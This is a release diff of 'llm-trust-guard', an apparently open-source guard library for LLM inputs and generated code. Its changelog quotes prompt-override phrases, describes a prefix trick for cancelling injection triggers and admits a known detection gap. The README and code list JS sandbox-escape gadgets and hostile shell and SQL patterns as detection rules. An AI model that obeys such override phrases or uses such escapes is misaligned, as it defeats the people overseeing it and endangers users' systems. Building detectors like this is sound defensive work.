llm-trust-guard 4.20.1 → 4.21.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -5,6 +5,107 @@ All notable changes to `llm-trust-guard` will be documented in this file.
5
5
  The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
6
6
  and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
7
7
 
8
+ ## [4.21.3] - 2026-06-13
9
+
10
+ ### Docs / CI
11
+
12
+ - **README**: the `CodeAnalyzerBackend` example is now complete and copy-pasteable
13
+ (full acorn walker that blocks `constructor.constructor` / `Function` gadgets), with
14
+ a GitHub link to the full reference. It previously called a placeholder function and
15
+ pointed at `examples/…` which isn't shipped in the npm package — so consumers had no
16
+ runnable backend for the headline new feature.
17
+ - **CI**: bumped GitHub Actions off the deprecated Node 20 runtime (`checkout@v6`,
18
+ `setup-node@v6`, `setup-python@v6`, `gh-release@v3`, `github-script@v8`) ahead of the
19
+ 2026-06-16 forced migration.
20
+
21
+ No code/behavior change.
22
+
23
+ ## [4.21.2] - 2026-06-12
24
+
25
+ ### Docs — document `CodeAnalyzerBackend`; add README-sync gate (G11)
26
+
27
+ - **README**: documented the pluggable `CodeAnalyzerBackend` seam (4.21.0) with an
28
+ acorn example, and noted CommonJS + ESM both work (4.21.1). The README previously
29
+ did not mention the new public API.
30
+ - **Verification (G11)**: a new gate fails the build when `src/index.ts` (public
31
+ exports) changes since the last tag but `README.md` does not — closing the
32
+ docs-drift gap (override `ALLOW_NO_README_UPDATE=1`). See VERIFICATION.md.
33
+
34
+ No code/behavior change.
35
+
36
+ ## [4.21.1] - 2026-06-12
37
+
38
+ ### Fixed — ESM named exports (`dist/index.mjs`)
39
+
40
+ `import { InputSanitizer } from "llm-trust-guard"` previously failed for **every**
41
+ named export — `dist/index.mjs` was default-only. Cause: `build-esm.js` bundled the
42
+ **compiled CJS** (`dist/index.js`), and esbuild cannot recover named exports from
43
+ tsc's CJS getter output (latent since the initial commit; not a size tradeoff —
44
+ `minify` is orthogonal). CommonJS `require()` was always fine, which is why it went
45
+ unnoticed.
46
+
47
+ - **Fix:** build the `.mjs` from the TS **source** (`src/index.ts`) so `export { … }`
48
+ statements survive. `dist/index.mjs` now has a named-export block (0 → 1) and no
49
+ default-only export.
50
+ - Regression guard added: `tests/esm-build.test.ts`.
51
+ - No API or behavior change; CommonJS unaffected. Verified by `npm pack` → ESM consumer
52
+ smoke (named `import { … }` now resolves) — see `tests/adversarial/RESULTS-v4.21.1.md`.
53
+
54
+ ## [4.21.0] - 2026-06-09
55
+
56
+ ### Added — Pluggable `CodeAnalyzerBackend` (optional AST analysis, zero-dep default)
57
+
58
+ `CodeExecutionGuard` now accepts an optional `analyzerBackend` — a pluggable
59
+ code-analysis seam (mirroring the existing `DetectionClassifier`). The default stays
60
+ **regex-only / zero-dependency**; provide a backend to add AST-level detection of JS
61
+ sandbox-escape gadgets that regex cannot reliably see.
62
+
63
+ - New exports: `CodeFinding`, `CodeAnalyzerBackend`; new config field `analyzerBackend`
64
+ and `CodeExecutionGuard.setAnalyzerBackend()`. Findings are **additive** (only add
65
+ detections); a throwing backend never crashes the guard.
66
+ - Reference implementation: `examples/acorn-code-analyzer.ts` (acorn). Measured —
67
+ three JS escape gadgets (`this.constructor.constructor('return process')()`,
68
+ `[].constructor.constructor(...)()`, `Function('return process')()`) go **3/3 missed
69
+ by regex → 3/3 blocked** with the backend; benign JS unaffected.
70
+ - 9 new tests (6 zero-dep wiring + 3 acorn). `acorn` added as a **devDependency only** —
71
+ the published package keeps **zero production dependencies**.
72
+ - Why a seam and not a bundled parser: JS has no stdlib parser, so bundling acorn/oxc
73
+ would break the zero-dep guarantee. The Python package uses stdlib `ast` directly
74
+ (v0.10.3). See RESEARCH_LOG.md. Detection only — still no runtime sandbox.
75
+
76
+ ## [4.20.2] - 2026-06-06
77
+
78
+ ### Added — Benign-context suppression (false-positive reduction)
79
+
80
+ `InputSanitizer` now cancels the soft `ignore_instructions` / `disregard_above`
81
+ triggers when the object is a benign technical noun (e.g. "ignore the
82
+ whitespace", "ignore case", "ignore the previous error") **and** the input
83
+ contains no instruction/rule/prompt/safety noun anywhere, **and** the prompt
84
+ carries no high-signal exfiltration/execution/credential/money token. Any real
85
+ injection ("ignore previous instructions", "disregard your rules") references an
86
+ instruction-noun and is never suppressed.
87
+
88
+ - **Suppression veto**: suppression is refused when the prompt also contains a
89
+ URL, email address, credential/secret word, shell pipe / `rm -rf` / `curl` /
90
+ `wget`, destructive `delete`/`drop`, a money amount (`$NN`), or a long account
91
+ number. This closes the escape hatch where an attacker prefixes a real payload
92
+ with "ignore the previous output …" to cancel the trigger. 10 bypass controls
93
+ added to the probe (all blocked).
94
+ - New curated probe `tests/benign-context.test.ts`: 28 benign coding-context
95
+ prompts (0 blocked) + 12 attack controls + 10 suppression-bypass controls
96
+ (0 leaked).
97
+ - **Recall preserved**: full suite 716 pass (was 711). WildChat-1M shard 0
98
+ (n=10,000, seed 42) Pipeline A block count is **unchanged at 493 (raw FPR
99
+ 4.93%)** — that consumer corpus does not exercise the benign technical-object
100
+ class, so the win is scoped to coding/technical deployments and does **not**
101
+ move the published ~2.73% corrected WildChat FPR.
102
+ - Reproducible WildChat measurement committed at
103
+ `tests/adversarial/fixtures/wildchat-sample10k.jsonl` (Git LFS, ODC-BY,
104
+ `allenai/WildChat-1M`).
105
+ - Known pre-existing gap noted (not addressed here): `"disregard your previous
106
+ rules"` is not matched by the `disregard` patterns — a recall issue, separate
107
+ from this FP work.
108
+
8
109
  ## [4.20.1] - 2026-04-24
9
110
 
10
111
  ### Changed — Documentation accuracy
package/CONTRIBUTING.md CHANGED
@@ -219,12 +219,26 @@ When adding new detection patterns:
219
219
 
220
220
  #### PR Checklist
221
221
 
222
- - [ ] Tests pass (`npm test`)
223
- - [ ] Code follows style guidelines
224
- - [ ] Documentation updated
225
- - [ ] CHANGELOG.md updated (for features/fixes)
226
- - [ ] No console.log statements (except for intentional logging)
227
- - [ ] Types are properly defined
222
+ - [ ] `npm run verify` is green (the eval-gated pipeline — see [VERIFICATION.md](VERIFICATION.md))
223
+ - [ ] New/changed `src/` ships with tests (enforced by gate **G6**)
224
+ - [ ] CHANGELOG.md top entry matches the version (gate **G7**)
225
+ - [ ] `tests/adversarial/RESULTS-v<version>.md` written for any release/claim (gate **G8**)
226
+ - [ ] `RESEARCH_LOG.md` entry added if the change cites a threat/technique/benchmark
227
+ - [ ] No console.log statements (except intentional logging)
228
+
229
+ ### Verification (required before push)
230
+
231
+ Run one command — it runs build, the full suite, coverage thresholds, the WildChat
232
+ FP-regression gate, the adversarial-bypass probe, and the changelog/results checks:
233
+
234
+ ```bash
235
+ npm run verify
236
+ ```
237
+
238
+ This is enforced both locally (`.githooks/pre-push`, install via
239
+ `bash scripts/install-hooks.sh`) and in CI, so it can't be skipped. See
240
+ [VERIFICATION.md](VERIFICATION.md) for the eight gates and how each maps to our
241
+ "don't break it / don't make it up / publish the basis" rules.
228
242
 
229
243
  ### Review Process
230
244
 
package/README.md CHANGED
@@ -193,6 +193,54 @@ const output = guard.filterOutput(llmResponse, session.role);
193
193
  |-----------|---------|
194
194
  | DetectionClassifier | Plug in any ML backend (sync or async) alongside regex guards |
195
195
  | createRegexClassifier() | Built-in regex classifier as a DetectionClassifier callback |
196
+ | CodeAnalyzerBackend | Plug an AST parser (e.g. acorn/oxc) into `CodeExecutionGuard` — catches JS sandbox-escape gadgets regex misses, while the default stays zero-dependency |
197
+
198
+ `CodeExecutionGuard` is regex-only by default (zero dependencies). For AST-level
199
+ detection of gadget chains like `this.constructor.constructor('return process')()`
200
+ or the `Function` constructor, plug in a parser via `analyzerBackend` (findings are
201
+ additive; a throwing backend never crashes the guard):
202
+
203
+ ```ts
204
+ import { CodeExecutionGuard, type CodeAnalyzerBackend, type CodeFinding } from 'llm-trust-guard';
205
+ import { parse } from 'acorn'; // your dependency, not the library's
206
+
207
+ function walk(node: any, visit: (n: any) => void) {
208
+ if (!node || typeof node !== 'object') return;
209
+ if (typeof node.type === 'string') visit(node);
210
+ for (const k of Object.keys(node)) {
211
+ const c = node[k];
212
+ if (Array.isArray(c)) c.forEach((x) => walk(x, visit));
213
+ else if (c && typeof c === 'object') walk(c, visit);
214
+ }
215
+ }
216
+
217
+ const acornBackend: CodeAnalyzerBackend = (code, language) => {
218
+ if (language !== 'javascript') return [];
219
+ let ast: any;
220
+ try { ast = parse(code, { ecmaVersion: 'latest', sourceType: 'module' }); }
221
+ catch { return []; } // unparseable — the guard's regex pass still ran
222
+ const findings: CodeFinding[] = [];
223
+ walk(ast, (n) => {
224
+ // X.constructor.constructor(...) — classic sandbox escape
225
+ if (n.type === 'CallExpression' && n.callee?.property?.name === 'constructor' &&
226
+ n.callee.object?.property?.name === 'constructor') {
227
+ findings.push({ name: 'constructor_escape', severity: 60 });
228
+ }
229
+ // Function('...') as a call (no `new`)
230
+ if (n.type === 'CallExpression' && n.callee?.type === 'Identifier' && n.callee.name === 'Function') {
231
+ findings.push({ name: 'function_constructor', severity: 50 });
232
+ }
233
+ });
234
+ return findings;
235
+ };
236
+
237
+ const guard = new CodeExecutionGuard({ analyzerBackend: acornBackend });
238
+ guard.analyze("this.constructor.constructor('return process')()", 'javascript').allowed; // false
239
+ ```
240
+
241
+ Full reference (also handles `__proto__` and dynamic `import()`):
242
+ [`examples/acorn-code-analyzer.ts`](https://github.com/nkratk/llm-trust-guard/blob/main/examples/acorn-code-analyzer.ts).
243
+ The Python package ships this analysis built in (stdlib `ast`, no backend needed).
196
244
 
197
245
  ## OWASP Coverage
198
246
 
@@ -16,6 +16,26 @@
16
16
  * - Resource limit enforcement
17
17
  * - Language-specific security rules
18
18
  */
19
+ /** A single finding from a pluggable code-analysis backend. */
20
+ export interface CodeFinding {
21
+ name: string;
22
+ /** Added to the risk score (0-100 scale). */
23
+ severity: number;
24
+ kind?: string;
25
+ }
26
+ /**
27
+ * Pluggable code-analysis backend (e.g. an AST parser such as acorn or oxc).
28
+ *
29
+ * Default is regex-only (zero dependencies). Provide a backend to add AST-level
30
+ * detection — sandbox-escape gadget chains, the Function constructor, dynamic
31
+ * import — that regex cannot reliably see. Findings are ADDITIVE: a backend can
32
+ * only add detections, never remove them, and a throwing backend never crashes
33
+ * the guard. See `examples/acorn-code-analyzer.ts` for a reference implementation.
34
+ *
35
+ * (The Python package uses stdlib `ast` directly; JS has no stdlib parser, so the
36
+ * npm package keeps regex zero-dep by default and takes any parser via this seam.)
37
+ */
38
+ export type CodeAnalyzerBackend = (code: string, language: string) => CodeFinding[];
19
39
  export interface CodeExecutionGuardConfig {
20
40
  /** Allowed programming languages */
21
41
  allowedLanguages?: string[];
@@ -43,6 +63,8 @@ export interface CodeExecutionGuardConfig {
43
63
  }>;
44
64
  /** Risk threshold for blocking (0-100) */
45
65
  riskThreshold?: number;
66
+ /** Optional pluggable AST analyzer (acorn/oxc/etc.). Additive on top of regex. */
67
+ analyzerBackend?: CodeAnalyzerBackend;
46
68
  }
47
69
  export interface CodeAnalysisResult {
48
70
  allowed: boolean;
@@ -76,10 +98,13 @@ export interface SandboxConfig {
76
98
  }
77
99
  export declare class CodeExecutionGuard {
78
100
  private config;
101
+ private analyzerBackend?;
79
102
  private readonly DANGEROUS_PATTERNS;
80
103
  private readonly DEFAULT_BLOCKED_IMPORTS;
81
104
  private readonly DEFAULT_BLOCKED_FUNCTIONS;
82
105
  constructor(config?: CodeExecutionGuardConfig);
106
+ /** Register/replace the pluggable AST analyzer backend at runtime. */
107
+ setAnalyzerBackend(backend: CodeAnalyzerBackend): void;
83
108
  /**
84
109
  * Analyze code for dangerous patterns before execution
85
110
  */
@@ -1,2 +1,2 @@
1
- "use strict";Object.defineProperty(exports,"__esModule",{value:!0}),exports.CodeExecutionGuard=void 0;class CodeExecutionGuard{constructor(e={}){this.DANGEROUS_PATTERNS={javascript:[{name:"eval",pattern:/\beval\s*\(/g,severity:50},{name:"function_constructor",pattern:/new\s+Function\s*\(/g,severity:50},{name:"child_process",pattern:/require\s*\(\s*['"]child_process['"]\s*\)/g,severity:60},{name:"exec",pattern:/\b(exec|execSync|spawn|spawnSync)\s*\(/g,severity:60},{name:"fs_write",pattern:/\b(writeFile|writeFileSync|appendFile|unlink|rmdir)\s*\(/g,severity:45},{name:"process_env",pattern:/process\.env/g,severity:30},{name:"require_dynamic",pattern:/require\s*\(\s*[^'"]/g,severity:40},{name:"vm_module",pattern:/require\s*\(\s*['"]vm['"]\s*\)/g,severity:55},{name:"fetch_external",pattern:/fetch\s*\(\s*['"]https?:\/\/(?!localhost)/g,severity:35},{name:"websocket",pattern:/new\s+WebSocket\s*\(/g,severity:35},{name:"prototype_pollution",pattern:/__proto__|constructor\s*\[|Object\.setPrototypeOf/g,severity:50},{name:"global_access",pattern:/\bglobal\b|\bglobalThis\b/g,severity:35}],python:[{name:"eval",pattern:/\beval\s*\(/g,severity:50},{name:"exec",pattern:/\bexec\s*\(/g,severity:50},{name:"compile",pattern:/\bcompile\s*\(/g,severity:45},{name:"subprocess",pattern:/import\s+subprocess|from\s+subprocess/g,severity:60},{name:"os_system",pattern:/os\.(system|popen|exec)/g,severity:60},{name:"os_module",pattern:/import\s+os|from\s+os\s+import/g,severity:40},{name:"socket",pattern:/import\s+socket|from\s+socket/g,severity:40},{name:"pickle",pattern:/import\s+pickle|pickle\.loads?/g,severity:55},{name:"ctypes",pattern:/import\s+ctypes|from\s+ctypes/g,severity:55},{name:"builtins",pattern:/__builtins__|__import__/g,severity:50},{name:"file_write",pattern:/open\s*\([^)]*['"]w['"]/g,severity:40},{name:"requests",pattern:/requests\.(get|post|put|delete)\s*\(/g,severity:35},{name:"getattr_dynamic",pattern:/getattr\s*\(\s*\w+\s*,\s*[^'"]/g,severity:40}],bash:[{name:"rm_rf",pattern:/rm\s+(-rf?|--recursive)/gi,severity:70},{name:"sudo",pattern:/\bsudo\b/gi,severity:60},{name:"curl_pipe",pattern:/curl\s+.*\|\s*(ba)?sh/gi,severity:70},{name:"wget_execute",pattern:/wget\s+.*&&\s*(ba)?sh/gi,severity:70},{name:"eval",pattern:/\beval\b/gi,severity:50},{name:"env_dump",pattern:/\benv\b|\bprintenv\b/gi,severity:35},{name:"chmod",pattern:/chmod\s+(\+x|777|755)/gi,severity:40},{name:"chown",pattern:/\bchown\b/gi,severity:45},{name:"dd",pattern:/\bdd\s+if=/gi,severity:55},{name:"nc_reverse",pattern:/\bnc\b.*-e/gi,severity:70},{name:"base64_decode",pattern:/base64\s+(-d|--decode)/gi,severity:40},{name:"cron",pattern:/crontab|\/etc\/cron/gi,severity:50}],sql:[{name:"drop_table",pattern:/DROP\s+(TABLE|DATABASE)/gi,severity:70},{name:"delete_all",pattern:/DELETE\s+FROM\s+\w+\s*(;|$)/gi,severity:60},{name:"truncate",pattern:/TRUNCATE\s+TABLE/gi,severity:65},{name:"union_injection",pattern:/UNION\s+(ALL\s+)?SELECT/gi,severity:55},{name:"comment_injection",pattern:/--\s*$/gm,severity:30},{name:"xp_cmdshell",pattern:/xp_cmdshell/gi,severity:70},{name:"into_outfile",pattern:/INTO\s+(OUT|DUMP)FILE/gi,severity:60},{name:"load_file",pattern:/LOAD_FILE\s*\(/gi,severity:55}]},this.DEFAULT_BLOCKED_IMPORTS={javascript:["child_process","cluster","dgram","dns","net","tls","vm","worker_threads","v8","perf_hooks"],python:["subprocess","os","sys","socket","ctypes","pickle","marshal","multiprocessing","threading","_thread"]},this.DEFAULT_BLOCKED_FUNCTIONS=["eval","exec","system","popen","spawn","fork","execv","execve","dlopen","compile"],this.config={allowedLanguages:e.allowedLanguages??["javascript","python","sql"],blockedImports:e.blockedImports??[],blockedFunctions:e.blockedFunctions??this.DEFAULT_BLOCKED_FUNCTIONS,maxCodeLength:e.maxCodeLength??1e4,maxExecutionTime:e.maxExecutionTime??5e3,allowNetwork:e.allowNetwork??!1,allowFileSystem:e.allowFileSystem??!1,allowShell:e.allowShell??!1,allowEnvAccess:e.allowEnvAccess??!1,customPatterns:e.customPatterns??[],riskThreshold:e.riskThreshold??50}}analyze(e,a,s){const n=s||`code-${Date.now()}`,r=a.toLowerCase(),o=[];let i=0;if(!this.config.allowedLanguages.includes(r))return{allowed:!1,reason:`Language '${a}' is not allowed`,violations:["disallowed_language"],request_id:n,code_analysis:{language:r,length:e.length,dangerous_imports:[],dangerous_functions:[],system_calls:[],network_access:!1,file_access:!1,shell_access:!1,env_access:!1,risk_score:100,complexity_score:0},recommendations:[`Use one of: ${this.config.allowedLanguages.join(", ")}`]};e.length>this.config.maxCodeLength&&(o.push("code_too_long"),i+=20);const l=[...this.DANGEROUS_PATTERNS[r]||[],...this.config.customPatterns],c=[],p=[],m=[];let u=!1,g=!1,h=!1,d=!1;for(const{name:t,pattern:f,severity:v}of l)e.match(f)&&(o.push(`dangerous_pattern_${t}`),i+=v,(t.includes("exec")||t.includes("spawn")||t.includes("system")||t.includes("subprocess"))&&(h=!0,m.push(t)),(t.includes("fs")||t.includes("file")||t.includes("write"))&&(g=!0),(t.includes("fetch")||t.includes("socket")||t.includes("request")||t.includes("websocket"))&&(u=!0),t.includes("env")&&(d=!0),(t.includes("import")||t.includes("require"))&&c.push(t),(t.includes("eval")||t.includes("exec")||t.includes("compile"))&&p.push(t));const b=[...this.config.blockedImports,...this.DEFAULT_BLOCKED_IMPORTS[r]||[]];for(const t of b){const f=[new RegExp(`require\\s*\\(\\s*['"]${t}['"]\\s*\\)`,"g"),new RegExp(`import\\s+.*from\\s+['"]${t}['"]`,"g"),new RegExp(`import\\s+${t}`,"g"),new RegExp(`from\\s+${t}\\s+import`,"g")];for(const v of f)v.test(e)&&(o.push(`blocked_import_${t}`),c.push(t),i+=40)}for(const t of this.config.blockedFunctions)new RegExp(`\\b${t}\\s*\\(`,"g").test(e)&&(o.push(`blocked_function_${t}`),p.push(t),i+=35);u&&!this.config.allowNetwork&&(o.push("network_access_denied"),i+=30),g&&!this.config.allowFileSystem&&(o.push("filesystem_access_denied"),i+=30),h&&!this.config.allowShell&&(o.push("shell_access_denied"),i+=40),d&&!this.config.allowEnvAccess&&(o.push("env_access_denied"),i+=25);const w=this.calculateComplexity(e,r);i=Math.min(100,i);const y=i>=this.config.riskThreshold,_={allowed:!y,reason:y?`Code blocked: ${o.slice(0,3).join(", ")}`:"Code analysis passed",violations:o,request_id:n,code_analysis:{language:r,length:e.length,dangerous_imports:[...new Set(c)],dangerous_functions:[...new Set(p)],system_calls:[...new Set(m)],network_access:u,file_access:g,shell_access:h,env_access:d,risk_score:i,complexity_score:w},recommendations:this.generateRecommendations(o,i)};return y||(_.sandbox_config=this.generateSandboxConfig(u,g,h,d),o.length>0&&(_.sanitized_code=this.sanitizeCode(e,r))),_}validateSyntax(e,a){const s=[];switch(a.toLowerCase()){case"javascript":const r=(e.match(/{/g)||[]).length,o=(e.match(/}/g)||[]).length;r!==o&&s.push("Unbalanced curly braces");const i=(e.match(/\(/g)||[]).length,l=(e.match(/\)/g)||[]).length;i!==l&&s.push("Unbalanced parentheses");break;case"python":const c=(e.match(/'/g)||[]).length,p=(e.match(/"/g)||[]).length,m=(e.match(/'''|"""/g)||[]).length;(c-m*3)%2!==0&&s.push("Unclosed single quotes"),(p-m*3)%2!==0&&s.push("Unclosed double quotes");break;case"sql":(e.match(/'/g)||[]).length%2!==0&&s.push("Unclosed single quotes in SQL");break}return{valid:s.length===0,errors:s}}generateSandboxConfig(e,a,s,n){return{timeout:this.config.maxExecutionTime,memoryLimit:128*1024*1024,allowedSyscalls:this.getAllowedSyscalls(e,a,s),networkPolicy:e&&this.config.allowNetwork?"localhost":"none",filesystemPolicy:a&&this.config.allowFileSystem?"temponly":"none",envVars:n&&this.config.allowEnvAccess?{NODE_ENV:"sandbox",SANDBOX:"true"}:{}}}sanitizeCode(e,a){let s=e;const n=this.DANGEROUS_PATTERNS[a]||[];for(const{pattern:o,severity:i}of n)i>=50&&(s=s.replace(o,"/* BLOCKED */"));const r=[...this.config.blockedImports,...this.DEFAULT_BLOCKED_IMPORTS[a]||[]];for(const o of r){const i=[new RegExp(`require\\s*\\(\\s*['"]${o}['"]\\s*\\)`,"g"),new RegExp(`import\\s+.*from\\s+['"]${o}['"].*`,"gm"),new RegExp(`import\\s+${o}.*`,"gm"),new RegExp(`from\\s+${o}\\s+import.*`,"gm")];for(const l of i)s=s.replace(l,"/* BLOCKED_IMPORT */")}return s}getAllowedLanguages(){return[...this.config.allowedLanguages]}addDangerousPattern(e,a,s,n){this.DANGEROUS_PATTERNS[e]||(this.DANGEROUS_PATTERNS[e]=[]),this.DANGEROUS_PATTERNS[e].push({name:a,pattern:s,severity:n})}calculateComplexity(e,a){let s=0;const r={javascript:/\b(if|else|for|while|switch|try|catch)\b/g,python:/\b(if|elif|else|for|while|try|except|with)\b/g,sql:/\b(CASE|WHEN|IF|WHILE|LOOP)\b/gi}[a];if(r){const c=e.match(r)||[];s+=c.length*5}const i={javascript:/\b(function|=>|\basync\b)/g,python:/\bdef\b|\blambda\b/g,sql:/\bCREATE\s+(FUNCTION|PROCEDURE)\b/gi}[a];if(i){const c=e.match(i)||[];s+=c.length*10}const l=e.split(`
2
- `).length;return s+=Math.min(l,100),Math.min(100,s)}getAllowedSyscalls(e,a,s){const n=["read","write","exit","brk","mmap","munmap","close"];return e&&this.config.allowNetwork&&n.push("socket","connect","bind","listen","accept"),a&&this.config.allowFileSystem&&n.push("open","stat","fstat","lstat","access"),n}generateRecommendations(e,a){const s=[];return e.some(n=>n.includes("import"))&&s.push("Remove or replace blocked imports with safe alternatives"),e.some(n=>n.includes("eval")||n.includes("exec"))&&s.push("Avoid dynamic code execution - use static alternatives"),e.some(n=>n.includes("network"))&&s.push("Remove network access or use approved endpoints only"),e.some(n=>n.includes("filesystem"))&&s.push("Use temporary directories or remove file operations"),e.some(n=>n.includes("shell"))&&s.push("Shell access is not permitted - use language-native alternatives"),a>=70&&s.push("Code requires significant review before execution"),s.length===0&&s.push("Code passed security analysis"),s}}exports.CodeExecutionGuard=CodeExecutionGuard;
1
+ "use strict";Object.defineProperty(exports,"__esModule",{value:!0}),exports.CodeExecutionGuard=void 0;class CodeExecutionGuard{constructor(e={}){this.DANGEROUS_PATTERNS={javascript:[{name:"eval",pattern:/\beval\s*\(/g,severity:50},{name:"function_constructor",pattern:/new\s+Function\s*\(/g,severity:50},{name:"child_process",pattern:/require\s*\(\s*['"]child_process['"]\s*\)/g,severity:60},{name:"exec",pattern:/\b(exec|execSync|spawn|spawnSync)\s*\(/g,severity:60},{name:"fs_write",pattern:/\b(writeFile|writeFileSync|appendFile|unlink|rmdir)\s*\(/g,severity:45},{name:"process_env",pattern:/process\.env/g,severity:30},{name:"require_dynamic",pattern:/require\s*\(\s*[^'"]/g,severity:40},{name:"vm_module",pattern:/require\s*\(\s*['"]vm['"]\s*\)/g,severity:55},{name:"fetch_external",pattern:/fetch\s*\(\s*['"]https?:\/\/(?!localhost)/g,severity:35},{name:"websocket",pattern:/new\s+WebSocket\s*\(/g,severity:35},{name:"prototype_pollution",pattern:/__proto__|constructor\s*\[|Object\.setPrototypeOf/g,severity:50},{name:"global_access",pattern:/\bglobal\b|\bglobalThis\b/g,severity:35}],python:[{name:"eval",pattern:/\beval\s*\(/g,severity:50},{name:"exec",pattern:/\bexec\s*\(/g,severity:50},{name:"compile",pattern:/\bcompile\s*\(/g,severity:45},{name:"subprocess",pattern:/import\s+subprocess|from\s+subprocess/g,severity:60},{name:"os_system",pattern:/os\.(system|popen|exec)/g,severity:60},{name:"os_module",pattern:/import\s+os|from\s+os\s+import/g,severity:40},{name:"socket",pattern:/import\s+socket|from\s+socket/g,severity:40},{name:"pickle",pattern:/import\s+pickle|pickle\.loads?/g,severity:55},{name:"ctypes",pattern:/import\s+ctypes|from\s+ctypes/g,severity:55},{name:"builtins",pattern:/__builtins__|__import__/g,severity:50},{name:"file_write",pattern:/open\s*\([^)]*['"]w['"]/g,severity:40},{name:"requests",pattern:/requests\.(get|post|put|delete)\s*\(/g,severity:35},{name:"getattr_dynamic",pattern:/getattr\s*\(\s*\w+\s*,\s*[^'"]/g,severity:40}],bash:[{name:"rm_rf",pattern:/rm\s+(-rf?|--recursive)/gi,severity:70},{name:"sudo",pattern:/\bsudo\b/gi,severity:60},{name:"curl_pipe",pattern:/curl\s+.*\|\s*(ba)?sh/gi,severity:70},{name:"wget_execute",pattern:/wget\s+.*&&\s*(ba)?sh/gi,severity:70},{name:"eval",pattern:/\beval\b/gi,severity:50},{name:"env_dump",pattern:/\benv\b|\bprintenv\b/gi,severity:35},{name:"chmod",pattern:/chmod\s+(\+x|777|755)/gi,severity:40},{name:"chown",pattern:/\bchown\b/gi,severity:45},{name:"dd",pattern:/\bdd\s+if=/gi,severity:55},{name:"nc_reverse",pattern:/\bnc\b.*-e/gi,severity:70},{name:"base64_decode",pattern:/base64\s+(-d|--decode)/gi,severity:40},{name:"cron",pattern:/crontab|\/etc\/cron/gi,severity:50}],sql:[{name:"drop_table",pattern:/DROP\s+(TABLE|DATABASE)/gi,severity:70},{name:"delete_all",pattern:/DELETE\s+FROM\s+\w+\s*(;|$)/gi,severity:60},{name:"truncate",pattern:/TRUNCATE\s+TABLE/gi,severity:65},{name:"union_injection",pattern:/UNION\s+(ALL\s+)?SELECT/gi,severity:55},{name:"comment_injection",pattern:/--\s*$/gm,severity:30},{name:"xp_cmdshell",pattern:/xp_cmdshell/gi,severity:70},{name:"into_outfile",pattern:/INTO\s+(OUT|DUMP)FILE/gi,severity:60},{name:"load_file",pattern:/LOAD_FILE\s*\(/gi,severity:55}]},this.DEFAULT_BLOCKED_IMPORTS={javascript:["child_process","cluster","dgram","dns","net","tls","vm","worker_threads","v8","perf_hooks"],python:["subprocess","os","sys","socket","ctypes","pickle","marshal","multiprocessing","threading","_thread"]},this.DEFAULT_BLOCKED_FUNCTIONS=["eval","exec","system","popen","spawn","fork","execv","execve","dlopen","compile"],this.config={allowedLanguages:e.allowedLanguages??["javascript","python","sql"],blockedImports:e.blockedImports??[],blockedFunctions:e.blockedFunctions??this.DEFAULT_BLOCKED_FUNCTIONS,maxCodeLength:e.maxCodeLength??1e4,maxExecutionTime:e.maxExecutionTime??5e3,allowNetwork:e.allowNetwork??!1,allowFileSystem:e.allowFileSystem??!1,allowShell:e.allowShell??!1,allowEnvAccess:e.allowEnvAccess??!1,customPatterns:e.customPatterns??[],riskThreshold:e.riskThreshold??50},this.analyzerBackend=e.analyzerBackend}setAnalyzerBackend(e){this.analyzerBackend=e}analyze(e,o,t){const n=t||`code-${Date.now()}`,r=o.toLowerCase(),a=[];let i=0;if(!this.config.allowedLanguages.includes(r))return{allowed:!1,reason:`Language '${o}' is not allowed`,violations:["disallowed_language"],request_id:n,code_analysis:{language:r,length:e.length,dangerous_imports:[],dangerous_functions:[],system_calls:[],network_access:!1,file_access:!1,shell_access:!1,env_access:!1,risk_score:100,complexity_score:0},recommendations:[`Use one of: ${this.config.allowedLanguages.join(", ")}`]};e.length>this.config.maxCodeLength&&(a.push("code_too_long"),i+=20);const l=[...this.DANGEROUS_PATTERNS[r]||[],...this.config.customPatterns],c=[],m=[],u=[];let h=!1,d=!1,g=!1,f=!1;for(const{name:s,pattern:p,severity:v}of l)e.match(p)&&(a.push(`dangerous_pattern_${s}`),i+=v,(s.includes("exec")||s.includes("spawn")||s.includes("system")||s.includes("subprocess"))&&(g=!0,u.push(s)),(s.includes("fs")||s.includes("file")||s.includes("write"))&&(d=!0),(s.includes("fetch")||s.includes("socket")||s.includes("request")||s.includes("websocket"))&&(h=!0),s.includes("env")&&(f=!0),(s.includes("import")||s.includes("require"))&&c.push(s),(s.includes("eval")||s.includes("exec")||s.includes("compile"))&&m.push(s));if(this.analyzerBackend)try{for(const s of this.analyzerBackend(e,r)){const p=`analyzer_${s.name}`;a.includes(p)||(a.push(p),i+=s.severity,m.push(s.name))}}catch{}const b=[...this.config.blockedImports,...this.DEFAULT_BLOCKED_IMPORTS[r]||[]];for(const s of b){const p=[new RegExp(`require\\s*\\(\\s*['"]${s}['"]\\s*\\)`,"g"),new RegExp(`import\\s+.*from\\s+['"]${s}['"]`,"g"),new RegExp(`import\\s+${s}`,"g"),new RegExp(`from\\s+${s}\\s+import`,"g")];for(const v of p)v.test(e)&&(a.push(`blocked_import_${s}`),c.push(s),i+=40)}for(const s of this.config.blockedFunctions)new RegExp(`\\b${s}\\s*\\(`,"g").test(e)&&(a.push(`blocked_function_${s}`),m.push(s),i+=35);h&&!this.config.allowNetwork&&(a.push("network_access_denied"),i+=30),d&&!this.config.allowFileSystem&&(a.push("filesystem_access_denied"),i+=30),g&&!this.config.allowShell&&(a.push("shell_access_denied"),i+=40),f&&!this.config.allowEnvAccess&&(a.push("env_access_denied"),i+=25);const w=this.calculateComplexity(e,r);i=Math.min(100,i);const y=i>=this.config.riskThreshold,_={allowed:!y,reason:y?`Code blocked: ${a.slice(0,3).join(", ")}`:"Code analysis passed",violations:a,request_id:n,code_analysis:{language:r,length:e.length,dangerous_imports:[...new Set(c)],dangerous_functions:[...new Set(m)],system_calls:[...new Set(u)],network_access:h,file_access:d,shell_access:g,env_access:f,risk_score:i,complexity_score:w},recommendations:this.generateRecommendations(a,i)};return y||(_.sandbox_config=this.generateSandboxConfig(h,d,g,f),a.length>0&&(_.sanitized_code=this.sanitizeCode(e,r))),_}validateSyntax(e,o){const t=[];switch(o.toLowerCase()){case"javascript":const r=(e.match(/{/g)||[]).length,a=(e.match(/}/g)||[]).length;r!==a&&t.push("Unbalanced curly braces");const 